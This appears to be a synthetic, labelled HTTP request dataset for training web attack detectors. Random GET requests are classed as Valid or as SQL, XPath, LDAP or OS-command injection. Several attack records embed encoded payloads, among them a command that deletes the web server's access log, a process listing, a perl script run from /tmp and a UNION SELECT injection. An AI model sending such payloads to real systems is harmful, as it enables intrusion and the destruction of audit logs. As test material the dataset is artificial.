User-Agent: Mozilla/5.0 (Machintosh; U; Mac OS X 1.0; sl-th; rv:4.7.0) Gecko/94214437
UA-CPU: x86
UA-Disp: 019,1130,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 810x5301
Via: 6.0 252.35.36.124, 7.2 143.75.183.159, FTP/3.2 132.64.214.207
Transfer-Encoding: bemCa; RtOoeT=sWgjirE
Upgrade: rCtoOd/1.7, sri/6.5, kddsop/1.3, LOZg/6.8, enie/8.5
Warning: 635 251.21.60.46 "eet4onNtZipzEri" "Tue, 06 Mar 07 24:49:36 CET"
X-Forwarded-For: 247.91.86.17
X-Serial-Number: 04731684394484360206
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19379
Start - Id: 10490
class: Valid
GET /0EFuD/Sifo5n4nMri/ilp/wrdkucUfd/dseetqiaodeortue7ey/oIx_T487HcXhP/ehT3/wIYhW9RvgFJoFqb/hdYY62rURf/lrushaihramj/tro/4exec.cgi?ovlf1ttmntl=isa4uil62Aflnye&_Q@-DbA=71031706&pIagi4oHoothnt=67800429&880dx=3417 HTTP/1.0
Host: www.o1tto.com
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.6, identity;q=0.8, identity;q=0.6, gzip;q=0.9, deflate
Accept-Language: i8f-g9dtuA6e;q=0.3, em7t-es;q=0.7, eeotf-nnaeiyc, teTdL-rJp22
Cache-Control: no-cache
Client-ip: 86.138.157.112
Cookie: jM-vb_ap=5oteta89;oemd3a8=pmA;met2tmdx4j=mog9nalsoegau;eue3wGGad6=r;EEAc=c@ ;stxoiezbeeepa9= pTowiAa
Cookie2: $Version="44"
Date: Sat, 10 Jan 04 07:35:13 GMT
ETag: W/"wMyqQu4QHcU1ks_n"
Expect: 1twi
From: Tntn@cwaeo7.gov
If-Modified-Since: Sun, 06 Mar 05 18:53:47 GMT
If-Unmodified-Since: Sun, 22 Jun 08 17:38:33 GMT
If-Match: *
If-None-Match: "58JChOpY77Spl2n.34"
If-Range: *
Max-Forwards: 9
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM b3k4cnB1c29ubmVhaHllaGV0Z2VzUnpvZVJ6anMxbU5uZHZpd2Fhc3NoeGl6ZGk=
Range: -19441,204-
Referer: /SDtoajho.js
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: maifwEda/3.6.0.3.2
UA-CPU: StrongARM
UA-Disp: 635,287,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9550x605
Via: FTP/7.2 234.221.225.135:05
Transfer-Encoding: e9i0
Upgrade: hpr/1.7, 2wn/2.6, lso/0.7
Warning: 910 www.egy3r.css "fraa4" "Thu, 08 Apr 10 02:52:22 GMT"
X-Forwarded-For: 123.125.206.4
X-Serial-Number: 2186301943746679
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10490
Start - Id: 25688
class: Valid
GET /fs/TH3dc/ozSQc2Ba.asmx?IfYcagxD=eC7F3IjK_t-&OCiWallpE=tCpag&ve=tgpstnd3%3DA&cobytnxv=jexp_&uarlr8n=eceriet HTTP/1.0
Host: 204.246.216.191:2686
Connection: keep-alive
Accept: audio/*;q=0.5, text/*
Accept-Charset: euc-kr;q=0.4
Accept-Encoding: compress;q=0.2, gzip;q=0.2, identity, compress, compress;q=0.4
Accept-Language: *
Cache-Control: max-stale=37178
Client-ip: 201.158.106.214
Cookie: rrei=018;jqXsock_streamGk=ncphnv;;stelnet-5viJaDwb=tyyhndztc;buonh=086;ihar7oaSxfe3a=ej2X9;Aehiwetlotc=vioomcAe8R
Cookie2: $Version="32"
Date: Wed, 25 Feb 09 17:03:21 GMT
ETag: ".c-aU048EYkEV0lE"
Expect: 100-continue
From: oyBm@Iqerhbe.st
If-Modified-Since: Sat, 11 Jun 05 12:11:46 CET
If-Unmodified-Since: Mon, 25 Jan 10 05:04:54 UTC
If-Match: *
If-None-Match: "ZduOxtBhm9WbkZCZ.5f"
If-Range: Thu, 29 Apr 10 01:36:55 GMT
Max-Forwards: 5469
MIME-Version: 5.5
Pragma: vih=nhdd7Vus
Proxy-Authorization: ed7c eaaxe=zcoeth
Authorization: NTLM b25pZm9lcGFlaGVXZWVuNWRpZXRlZ28xdG9lcmF1YW93ZXJp
Range: 474-85459,37271-
Referer: /qoawos/ncnxaie/rlsaum.nsf
TE: trailers,trailers
Trailer: Authorization
User-Agent: r3LCJAGKZ http://www.czsa2r.be
UA-CPU: MIPS
UA-Disp: 564,067,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8973x257
Via: FTP/3.3 104.73.237.131
Transfer-Encoding: identity
Upgrade: src/0.7
Warning: 473 www.arroi44e.png "m5ao1xhonpTIDgipma3b" 
X-Forwarded-For: 217.128.221.222
X-Serial-Number: 69267811196877405131
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25688
Start - Id: 49987
class: XPathInjection
GET /i0C/eaWMdRhPJJWEld3UGX1/2Y3homeqQed/hcex/hdBgPR8Q7KI2@.jpeg?esy=h&9lmoSanua5a=sXh4GEged&R55iWi=ph415HnmjI&reenteece4=%28i++%3C+count%28nc9ri%2Fchild%3A%3Atext%28%29%29++++and+j+++%3C++++count%28ls%2Fchild%3A%3Acomment%28%29%29++and+k+++++%3C++++count%28fpa%2Fchild%3A%3A*%29++%29&A6o=19788194&YQ7OHlSC0uvT=1hmwAmaBuJtG HTTP/1.0
Host: www.xuaaes.de
Connection: close
Accept: audio/*, text/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: diopq-oifep;q=0.2, toe-rC4a1;q=0.4, 45ezfpwH-egi1rreh;q=0.7
Cache-Control: max-age=90
Client-ip: 237.62.233.210
Cookie: g3SyiScayA=rC-LQtSPqrAX;Muqarpwh5iLsc=yojjm;_positionEpGJV4=iylreplace;a1se=orCas_fs5Z3C;mif=Eiiito0dpa
Cookie2: $Version="9"
Date: Sun, 06 Jan 08 21:04:57 GMT
Expect: 100-continue
If-Unmodified-Since: Fri, 26 Nov 04 06:31:24 UTC
If-Match: "J1aFHMN7HsDT-72_STaK"
If-None-Match: *
Max-Forwards: 6562
Authorization: NTLM ZnJleTJidGhMc2lpeGhyZW5nbmE3bG10c2FSb2JldVNhZXJpNXdrbzR3Tw==
Range: 8886-360900,-39090
Referer: /htrgt/Lyislntb/ea8soo/iKtAnvcf/eiheioe.asmx
TE: trailers
User-Agent: Mozilla/6.6 (Windows; U; Win98 3.2; oe-cn; rv:1.9.1) Gecko/64077418
UA-Pixels: 0803x6416
Via: 7.1 www.ator.css:9575, FTP/5.3 www.snuo3ir.htm, 9.0 www.otsw.jpg
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49987
Start - Id: 41827
class: SqlInjection
GET /loLXzAZjbW4_tH5C/aaoeaqda0tnasoeyu/attrb/lrlorroeeIn6ttsac/mIGcPQTalAcGqRbg/rlto1tSaoendn1avzp/sVsveeoohaioisl.shtml?n3a=u2COci4hitz&cs6wtns8a=ajG2J&elF=or+++0%3C%3E%28select+count%28*%29+++from++++Neb0oao%29&sdhszro8Rn=jQnbteDn3fett&ynurqat=mi&l2jlkewilnHo=4&tesrh7r3hak=on&lrh=7644&e3I=93121&el=66695&snIt32=swinnte&euneNampdrlv=soreUAjvdOmhpwd&eTqDsr=8&S6iiaieeiiaopui=298&es=hztmsb HTTP/1.0
Host: 6.173.166.149:3
Connection: ngsu
Accept: image/jpeg, application/postscript
Accept-Charset: euc-tw, isiri-3342
Accept-Encoding: gzip, identity;q=0.5
Accept-Language: okylfM0-bqyti2g, eco9rn5-mlb1ste;q=0.6
Cache-Control: max-age=8022
Client-ip: 200.70.15.74
Cookie: npdn=rlbn;htosr2niP=073824882;poeza=> ib;Fb=8;YCfromwDzOS8nw=Se
Cookie2: $Version="5"
Date: Fri, 19 Mar 04 18:01:06 UTC
ETag: "ba6@9N37PLSKTNy"
Expect: jao4e=iser
From: rene@lit4fatTnf.st
If-Modified-Since: Sat, 06 Sep 08 10:56:55 UTC
If-Unmodified-Since: Thu, 05 Jul 07 20:59:01 GMT
If-Match: "uksNWcbA@zsg4cd"
If-None-Match: "cCddMlT9Dyf7Y4L"
If-Range: Sat, 10 Mar 07 15:52:45 CET
Max-Forwards: 9473
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: aRdtao dotenhA=tIetgde
Range: -0842
Referer: /sDMzo/esrn76/ePh0nm/scbatse.dll
TE: trailers
Trailer: Max-Forwards
User-Agent: Tepe/1.4.2
UA-CPU: StrongARM
UA-Disp: 0572,127,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5914x483
Via: HTTP/1.6 www.o2o2rtes.gif, 0.4 61.159.11.145
Transfer-Encoding: identity
Upgrade: hcsrst/2.9, leHto/5.0, t6B/6.8, iheSt/9.4
Warning: 186 127.58.150.59 "ns2cjsi" "Mon, 05 May 08 16:07:50 GMT"
X-Forwarded-For: 206.140.252.134
X-Serial-Number: 431124702375
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41827
Start - Id: 38484
class: LdapInjection
GET /okao/nolfn.php4?aorl4=ndbT72EmdysAad&mdicftemsnjc=732169&tieomi=+&yaoasasra=rfrao&woyas=5130745&zWqGGpsn=%29%28++%7C++++%28sN%3DeIe5r*%29&ZpsZcDAT1t=t8iKg&er9raenst=5879779&6JKLK6IM=0702781&7selectoE1F80=mH5SPzBmX_P&Swnteso=234086&phteeeka5Twe=0 HTTP/1.0
Host: www.h8t5ijTrn.de:80
Connection: close
Accept: text/*
Accept-Charset: *
Accept-Encoding: identity;q=0.1, deflate, compress;q=0.1, identity
Accept-Language: *;q=0.7
Cache-Control: min-fresh=597
Client-ip: 50.101.101.125
Cookie: edmismI=jeledtimASnjti8m;6Scp5ahtmeenb=tnAratrti|f4ozdelete;hdmsomrbrbtiee=shiyiM=select(Coo-t=46a;eseLr9toteuado=42128326
Cookie2: $Version="5"
Date: Wed, 03 Dec 08 13:16:32 CET
ETag: W/"HdLDJ1hGjmZABeS"
Expect: eAXajean
From: b8antatt@o1neid.cz
If-Modified-Since: Fri, 06 Feb 04 03:52:24 CET
If-Unmodified-Since: Wed, 27 Aug 08 13:40:19 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 20 Jun 06 05:29:49 UTC
Max-Forwards: 7
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="kmaaul"
Authorization: Digest opaque="ogrgt"
Range: 900292-227,511-1,719645-073
Referer: /Icrn.cfm
TE: chunked,gzip,gzip
Trailer: Authorization
User-Agent: h1aeehy/9.9.3.8.6
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 6621x951
Via: 4.6 www.ha09siwo.shtml:8588
Transfer-Encoding: identity
Upgrade: Nlohim/6.2, ors/6.8, ine/9.2, aauq/0.7, cvl87u/8.4
Warning: 917 www.ashesmu.htm "elta4zdhaod" "Sun, 11 Jul 04 04:27:49 UTC"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38484
Start - Id: 32041
class: Valid
GET /nai3nheasyIuehraee/ozd5Bc.js? HTTP/1.1
Host: 131.72.162.141
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: n-nsan, i3o-es, e-wn;q=0.8, atolue-o8lde3;q=0.6, hn-oktlasy
Cache-Control: only-if-cached
Client-ip: 228.12.145.136
Cookie: ion=linktA6;8Hcsost0=i5nMP;znYJK=execl
Cookie2: $Version="7"
Date: Tue, 10 Jul 07 08:51:52 UTC
ETag: "rMby0oEYpb43U340YH"
Expect: 100-continue
From: 7Shh@remFh.cz
If-Modified-Since: Tue, 26 Sep 06 13:37:55 CET
If-Unmodified-Since: Wed, 02 Nov 05 05:34:14 UTC
If-Match: "awvr4PPjRQqPd_X"
If-None-Match: "VR8kxpSdkMB-..tGcI"
If-Range: Sun, 27 Sep 09 07:19:12 GMT
Max-Forwards: 5433
MIME-Version: 3.7
Pragma: nshb=yi
Proxy-Authorization: Basic YVlmZDo1c3Ny
Authorization: Basic YXRlSHliaGU6aXVuaEVvdHQ=
Range: 23518-
Referer: /nselod.bin
TE: trailers,gzip
Trailer: Date
User-Agent: Mozilla/0.2 (X11; U; Open BSD i386 3.1; he-lh; rv:4.3.2) Gecko/01486021
UA-CPU: x86
UA-Disp: 097,6604,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8661x2250
Via: HTTP/6.7 209.194.21.172
Transfer-Encoding: identity
Upgrade: nswin/2.0, nrnelw/2.2
Warning: 581 www.alh9h.jpeg "sgdDg1ramgaonAnw" 
X-Forwarded-For: 34.245.202.84
X-Serial-Number: 16576925520335
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32041
Start - Id: 36730
class: OsCommanding
GET /inleOVwQtN6dNmQyWb/.OaBgLXZGmH-sexec/sUBLCW.jsp?hCUfassi4ccab=51%2F%3Edb&oihpE=%250arm++-f++%2Fvar%2Flog%2Fhttpd%2Faccess_log++%3B&eiCoeSnae=nehee&rEnnTbtar5=%3F HTTP/1.0
Host: www.qirndcghit.biz
Connection: it7dtj
Accept: text/*;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: wrcrtnag-rad6yln, euaAowt-m;q=0.5, ehtfs-t1te1wx;q=0.6, iSenn-cSlrEHXg;q=0.2, Eteb-cmwiai7
Cache-Control: max-stale
Client-ip: 103.144.20.186
Cookie: MdUY7Zgc7e=dKs;enn=tSDb
Cookie2: $Version="51"
Date: Wed, 07 May 08 10:28:21 CET
ETag: W/"ED3bEWlrdsC7qV@8t"
Expect: 100-continue
From: uehzS@rs1ylsy5.ch
If-Modified-Since: Sun, 15 Mar 09 15:37:52 CET
If-Unmodified-Since: Fri, 31 Aug 07 14:19:05 GMT
If-Match: "7.FLD_rMMQLXTAnYw"
If-None-Match: *
If-Range: Tue, 13 Nov 07 21:33:29 CET
Max-Forwards: 17
MIME-Version: 6.4
Pragma: ue='rvreoynt'
Proxy-Authorization: it0a ison5ofO=srsyk
Authorization: Basic YWVuMVQ6aG1mem8=
Range: -47510,582-0
Referer: /if9icbZ/g7ttad/nT7l/Eiegoino.jsp
TE: gzip,trailers,deflate
Trailer: Cache-Control
User-Agent: 3gutla3e
UA-CPU: Sparc
UA-Disp: 8267,5613,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 402x4966
Via: FTP/1.9 www.a8n6pa.css:5012
Transfer-Encoding: compress
Warning: 028 www.eo6itwta.css "IsnphdAiybeogei" "Tue, 31 Aug 04 23:00:46 GMT"
X-Forwarded-For: 135.18.204.64
X-Serial-Number: 5966336
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36730
Start - Id: 43432
class: OsCommanding
GET /scqEaIstd.shtml?meBntes9rsr=%7Cps++++-auxwww++++%3B HTTP/1.1
Host: www.nslora4t.biz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: 1tlo-zgsnpnmz;q=0.3
Cache-Control: no-cache
Client-ip: 230.11.35.165
Cookie: us0t4nR5goo=12263337;soohEale9Hee=%(rc0aIolo9;o?d;zoh=wiem
Cookie2: $Version="28"
Date: Fri, 08 Feb 08 22:58:17 GMT
ETag: "LXuX1YfEDWDYmg@8e"
Expect: 100-continue
From: satt@ee2io.st
If-Modified-Since: Sat, 16 Feb 08 10:30:36 GMT
If-Unmodified-Since: Mon, 18 Aug 08 05:48:37 GMT
If-Match: "kiqglVPP@sCFdFE-"
If-None-Match: "5yN@qadtWaSIwcNLNoi"
If-Range: "8ZJQB2gVMwuCevYU_vyg"
Max-Forwards: 9641
MIME-Version: 4.0
Pragma: csirt4un=ace
Proxy-Authorization: Digest realm
Authorization: NTLM dWgybmV4YTZrckFPQXFoY29mTm9laGhsdU50OXduZHZodFpFdFRz
Range: 5130-,89497-47998,93-50140
Referer: /his1ldd/DcrM/tt7TzOe/nj1ohrew/tje2.js
TE: deflate,trailers
Trailer: Transfer-Encoding
User-Agent: ttsdeaa91 (tqBfs0HsOx; sCs-0VE; sGY6VPczg)
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 801x1629
Via: uwatc/0.4 www.le8sodo.html
Transfer-Encoding: ebnipp
Upgrade: e2idw/6.5, 2eabf/4.4, hean/1.8
Warning: 068 www.nEtms.tiff:791 "hzcetNt0o1a8aftr" "Thu, 03 Dec 09 09:45:12 UTC"
X-Forwarded-For: 15.27.14.91
X-Serial-Number: 208175776515023
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43432
Start - Id: 43272
class: OsCommanding
GET /crnm6t0iqmb.bin?8saqadt=%2Fperl++++%2Ftmp%2Fstarngro.pl++-p5172&rethx5aaxu=076&tidlayBu=07&ii2Avesxmn=%3D%26hheCt%28log&Rtedsde=rWf5 HTTP/1.0
Host: 185.200.231.227
Connection: close
Accept: */*;q=0.4
Accept-Charset: iso-8859-9;q=0.3, iso-8859-4, x-mac-turkish;q=0.3, euc-tw
Accept-Encoding: identity;q=0.8, identity
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 210.204.132.70
Cookie: eg=8i;meta7CA=i-HF;iOsystem7Vm=wntdo5&9e;emleygdrcnRt=67258735;lrt=wftphopens;guetaoasns7=uhsfni0ct
Cookie2: $Version="4"
Date: Mon, 03 May 10 02:37:51 UTC
ETag: "PEioMFbnQm-_spjg_"
Expect: b1t3F5ik=ccEnhleR;tysne=masht6
From: heEwPmnx@hafimu3.ch
If-Modified-Since: Tue, 17 Jun 08 01:42:49 CET
If-Unmodified-Since: Sat, 12 Mar 05 19:13:53 CET
If-Match: *
If-None-Match: "i6IRoZvzAP90gAs3PG"
If-Range: "9D.spwYXHqfm8@g-oU"
Max-Forwards: 4038
MIME-Version: 9.7
Pragma: j='eereeA'
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: Digest opaque="letle"
Range: 6444-90250,-039,9-0896
Referer: /neo3l/mfpOE/eswv.php4
TE: trailers,trailers,chunked;q=0.1
Trailer: Accept
User-Agent: Mozilla/1.0 (Windows; U; Windows NT 3.2; te-nA; rv:2.8.3) Gecko/71443413
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 478x271
Via: 7.9 www.zm0t.tiff:79
Transfer-Encoding: compress
Upgrade: tbvt2/4.8, iobdph/8.7, ciose/9.7
Warning: 824 77.211.235.51 "cihtsshy" "Wed, 01 Mar 06 07:42:35 UTC"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 5980220981423198
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43272
Start - Id: 11815
class: Valid
GET /rUI4oSFmk8NB9zm6Hz/ion/YKS5lwgeto@UzC.jpeg? HTTP/1.1
Host: www.hiin.ch
Connection: sdkmahn
Accept: application/postscript, image/png, image/*
Accept-Charset: iso-2022-kr;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: puet=ini
Client-ip: 12.163.189.174
Cookie: Cbsnebennave=o2htpass c((mbotusr-(;d;6ow2heee=e0YJ4ShR;3ia=ddiv
Cookie2: $Version="6"
Date: Mon, 28 Sep 09 23:19:35 CET
ETag: W/"qeBCGdsR4BV-Bmx@"
Expect: 100-continue
From: tnsjx@nvlaoadtiu.st
If-Modified-Since: Sat, 08 Jul 06 10:32:13 GMT
If-Unmodified-Since: Mon, 13 Aug 07 06:55:00 CET
If-Match: *
If-None-Match: "tOPipsc2_MC0Kn3E"
If-Range: *
Max-Forwards: 0280
MIME-Version: 4.4
Pragma: 2wS='hrmnn'
Proxy-Authorization: Basic bHRuc2VFZnI6bnVlZA==
Authorization: Basic aGJlTmE6dGljY3pJNXU=
Range: 845-,0-,-57
Referer: /eiele3eu.conf
TE: trailers,chunked,gzip
Trailer: TE
User-Agent: Mozilla/2.2 (Windows; U; Win98 6.2; 8k-ir; rv:1.7.3) Gecko/42702629
UA-CPU: x86
UA-Disp: 432,593,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0378x1134
Via: FTP/3.8 www.twfi.html
Transfer-Encoding: aOboi5; fAaznsoi=haaone9k
Upgrade: ptl/3.8, ewttf/4.6, ywn/8.3
Warning: 125 www.knwtlae.shtml "ad0et9kU3d4n6SuMdtN" "Thu, 30 Sep 04 09:26:08 GMT"
X-Forwarded-For: 75.214.139.60
X-Serial-Number: 63208652767395
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11815
Start - Id: 10643
class: Valid
GET /irscj/tArqH/dKAjO/dPy4SjrJfukNx/i1Mt_5/TjXSXWNMAg8AMdI/o4H@m_-ouA/sxYy8r.sh?cG4t2oerahnsnoe=147572&vztEu2tegoperle=puok6&WetcGCLcopywYCservicesS=+o&aiw83uabnhn=%3Cattpasswdmmldntbe9&WKkrum@B=17211&XXkZftp=3Erc&ztuu=76061&ea0arcO2Pdn=htpassdr3btnQS HTTP/1.0
Host: 76.92.34.174
Connection: close
Accept: image/gif;q=0.7, application/postscript;q=0.1, application/postscript;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 130.162.66.160
Cookie: apnfCgmyy=78
Cookie2: $Version="0"
Date: Sun, 21 Sep 08 19:59:25 GMT
ETag: W/"6JAOVGGez7Ua0VcS"
Expect: 100-continue
From: NWe3sao@jneted7.de
If-Modified-Since: Wed, 05 Nov 08 03:47:29 CET
If-Unmodified-Since: Wed, 14 Feb 07 16:08:12 GMT
If-Match: "z9sv6e5G@KeiwCQ"
If-None-Match: "ySBjwvdH8oT49LI"
If-Range: *
Max-Forwards: 42
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest response="FcF6f5Fc9A37e66cB49eaBB5B16af622"
Authorization: Digest algorithm=MD5-sess
Range: 6-0447,7686-38299,7705-
Referer: /Vl1awh.tiff
TE: trailers,trailers,chunked;q=0.6
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.3 (compatible; Konqueror/2.6; SunOS sun4u; yhwanman; atPAU5gs; senDth)
UA-CPU: 68000
UA-Disp: 492,6280,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7494x790
Via: 6.9 196.202.208.154, 2.4 www.a5b2w.jpeg:433
Transfer-Encoding: deflate
Upgrade: esd8yb/3.6, ebr7u/3.4, gieesh/7.2, iqtelo/1.1, oAp/5.7
Warning: 674 248.72.204.237 "qtwehtZfh" 
X-Forwarded-For: 224.80.134.105
X-Serial-Number: 975545371
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10643
Start - Id: 19122
class: Valid
GET /uQYDYBQSBlkcK_Ldv/rM/snaloLe/ou-pw84BSFITk6/ludnGbIkA/6_g3km9sB@THSmwPn7/zcatdCnjfegnlibhe/uPH9D_xZrdP_aLU/tistesjsl4setrDjeeoy/w5LEQ/lxN0GsL7R-S-i.swf? HTTP/1.0
Host: 94.222.244.84:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 250.159.224.244
Cookie: 4yvSsIntcn3ih=hto
Cookie2: $Version="13"
Date: Wed, 27 Dec 06 07:15:28 CET
ETag: W/"HKkidc2U2-J99DY_@P"
Expect: cthu=gr8i;ECs7f=crsOEEJ
From: eono6e9@e4noq.fr
If-Modified-Since: Fri, 15 Aug 08 19:19:22 UTC
If-Unmodified-Since: Sat, 03 Apr 04 23:52:51 GMT
If-Match: *
If-None-Match: "P3kbnNKeATeeSW2j83pY"
If-Range: Sun, 17 Jul 05 03:36:39 GMT
Max-Forwards: 1013
MIME-Version: 5.2
Pragma: oeHee=6nn
Proxy-Authorization: Digest uri=http://rhDeEzl.com/8Sfrs8nS.tiff
Authorization: NTLM YmxsdHNjYXNzZmR0ZHJpYVRhcml0TnRycm9nYW5lYkVucWV3ZXU=
Range: 83457-7
Referer: /onuy/uvte/hctlaS1h/eIdthY6.php
TE: chunked;q=0.9,gzip
Trailer: Warning
User-Agent: Khsgj/6.4
UA-CPU: x86
UA-Disp: 531,060,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 315x9224
Via: 8.5 189.209.35.116, FTP/5.3 247.47.145.52
Transfer-Encoding: deflate
Upgrade: acA9M/5.5, taudh/0.0
Warning: 335 www.ekmeiB.jpg "0lne" "Wed, 30 May 07 03:16:49 UTC"
X-Forwarded-For: 168.136.167.141
X-Serial-Number: 2665334656610459
----: ---------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 19122
Start - Id: 17160
class: Valid
GET /r.Vy6WKed3B/otGdar/lsni/_5hmPsggAdropujWXe.jpg? HTTP/1.1
Host: 203.210.252.243
Connection: droeo1ir
Accept: text/*, application/*
Accept-Charset: *;q=0.3
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: e='It'
Client-ip: 193.42.5.207
Cookie: ahdeoposer=9219523;RPPda=99395242;iteS0tDnl=\5ihtb;hbrsremom=ezbe1-1_xvIV
Cookie2: $Version="25"
Date: Sun, 10 Jan 10 04:26:11 GMT
ETag: W/"fC2iwVqebiOk3RGH"
Expect: hstde=1ellit
From: gcEsmc@smae.st
If-Modified-Since: Fri, 09 Jan 09 22:19:36 UTC
If-Unmodified-Since: Thu, 21 Apr 05 06:58:00 GMT
If-Match: *
If-None-Match: "FBUwaohQJ1Ier._Ce"
If-Range: *
Max-Forwards: 645
MIME-Version: 3.2
Pragma: d=irNtsea
Proxy-Authorization: NTLM ZWw1YzF0U1RkcmVlWnB5aGhpbzJOZXdQbGlkU29ucm9s
Authorization: iis40p ltrk2=itoiems
Range: 390931-971113
Referer: http://lEaehr.net/vst5n/Urtnp/deotiIac/tIrujeaa/ndtE3.bin
TE: gzip,trailers,deflate;q=0.0
Trailer: Accept-Encoding
User-Agent: Mozilla/8.9 (Windows; U; WinNT 3.7; v8-hn; rv:7.9.6) Gecko/92580118
UA-CPU: StrongARM
UA-Disp: 182,819,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0887x1006
Via: 8.9 249.134.157.240, 9.6 www.aaoeie.jpg
Transfer-Encoding: identity
Upgrade: wbigqt/6.4, hv08se/7.5, ses/3.0, iei/9.4, n6vl/4.7
Warning: 696 226.137.21.239 "teancE6uh" 
X-Forwarded-For: 181.160.254.196
X-Serial-Number: 80895113
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17160
Start - Id: 35089
class: SqlInjection
GET /WHm4ou2vXoL0A/oR0lbuoemir9afi/exncHhBPGFi6dNFGU/EsymjEv7rgxchos/i9f4Aa2X7Na/OOxkagpnetcatMm/aasged/mriaEgdojtfn8yt/w_9iP/wreo92ide4hi/nY8naLBVl9F/passthru9B4yn.js?6rlfrdsuene2xn=64aS_AHC&3peetet7Ula=oltgDT&iz.i=gn%5D+r HTTP/1.1
Host: 108.244.110.237
Connection: vtohra
Accept: audio/*, video/quicktime
Accept-Charset: *;q=0.4
Accept-Encoding: '  )/**/UNIONALL/**/SELECT/**/1/**/FROM/**/nh4pnyceq/**/WHERE/**/(''  =    '     /**/
Accept-Language: *;q=0.0
Cache-Control: 6ato=fehn
Client-ip: 134.67.218.89
Cookie: dHaWaotaolahlsC=02279;fea28O=ia;boot.inimailrZ=25731673;QlogaV3o=dwreuO;rtisT6aeenu=lgipeaprocessing-instructiondl Rde
Cookie2: $Version="6"
Date: Mon, 17 Sep 07 02:35:59 UTC
ETag: "lhhbnWrQchRflpNLMz"
Expect: 100-continue
If-Modified-Since: Wed, 09 Jul 08 03:25:29 CET
If-Unmodified-Since: Mon, 17 Nov 08 23:46:33 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 070
Pragma: no-cache
Proxy-Authorization: NTLM aTZ0cnJ1cmtlaTNpdG5lZHlobm5kbzlJdzQyYWloYWRvYW91YWVpZG5oczNhdA==
Authorization: NTLM QWVhdWVoc25kcGVhYXJ5ZHN0ZHRwOWV6ZW0zYXRhbm9pYWxzZXRh
Referer: http://onOantih.st/dahmaI/ecee1e.jsp
Trailer: TE
User-Agent: Mozilla/4.3 (compatible; MSIE 9.2; Mac OS X; n1jzuat4; dawttcedod; hnt1iT84)
Via: 5.1 174.114.192.147, HTTP/6.7 www.ynntihoa.jpg, zya/5.7 103.209.252.191
Transfer-Encoding: compress
X-Serial-Number: 290003
----: --------------------------------

null

End - Id: 35089
Start - Id: 27816
class: Valid
